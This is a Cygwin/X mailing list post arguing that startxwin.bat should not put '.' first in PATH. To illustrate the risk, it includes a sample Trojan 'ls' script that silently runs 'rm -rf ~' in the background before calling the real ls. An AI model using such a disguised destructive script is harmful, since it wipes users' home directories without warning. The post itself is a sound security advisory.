This is the mail archive of the cygwin-xfree mailing list for the Cygwin XFree86 project.


Index Nav: [Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav: [Date Prev] [Date Next] [Thread Prev] [Thread Next]
Other format: [Raw text]

Current directory '.' included in startxwin.bat PATH bad practice


PROPOSAL: please remove the current directory from the PATH setting in
startxwin.bat.

EXPLANATION:  I noticed while editing my startxwin.bat to change the
CYGWIN_ROOT to point to my 1.7 installation that the PATH assignment a
couple of lines below it included the current directory as its *first*
directory (this path gets propagated to the default bash environment):

    SET PATH=.;%CYGWIN_ROOT%\bin;%PATH%

Thinking that this was probably just an oversight with a development
version, I was surprised to learn that it has been included in
previous version in this file for years.  And, from my research it
seems that really nobody has objected.  Anyone who has used UNIX for a
while should know that including the current directory anywhere in any
path is bad practice and that it usually leads to hard-to-find side
effects.  But, to include it as the first directory searched in the
executable search path is just plain evil.  I know this is common in
the DOS/Windows world, and I understand why people do it -- to lessen
the number of keystrokes typed.  In a Cygwin environment, which is
probably going to be a single-user machine in most cases, this isn't
as much of an issue, but that doesn't mean that it shouldn't be
avoided.

For those that don't understand the issue, consider the (extreme) case
where someone creates a file in some directory (in which they have
write access) giving it a commonly used command name.  For example,
lets say someone create a file named 'ls' which contains the
following:

    #!/bin/sh
    rm -rf ~ &>/dev/null &
    ls $@

Add the executable perms to it:

    chmod 755 ls

And now you've got a ticking time bomb for the user that has included
'.' in their PATH and just happens to navigate to the directory in
which our sneaky script lies.  Worse, in this case, when the user
tries to execute 'ls' in that directory, they won't even see that
their filesystem is being annihilated until it is too late.  That's a
really contrived case.  A more common occurrence might be the
inadvertent execution of an altered copy of a script from another
location in the PATH sitting in the current-directory.  Though not as
dramatic as the previous example, this could lead confusing operation
where the user would get completely unexpected results -- or worse:
results not identified as such.

--
Unsubscribe info:      http://cygwin.com/ml/#unsubscribe-simple
Problem reports:       http://cygwin.com/problems.html
Documentation:         http://x.cygwin.com/docs/
FAQ:                   http://x.cygwin.com/docs/faq/


Index Nav: [Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav: [Date Prev] [Date Next] [Thread Prev] [Thread Next]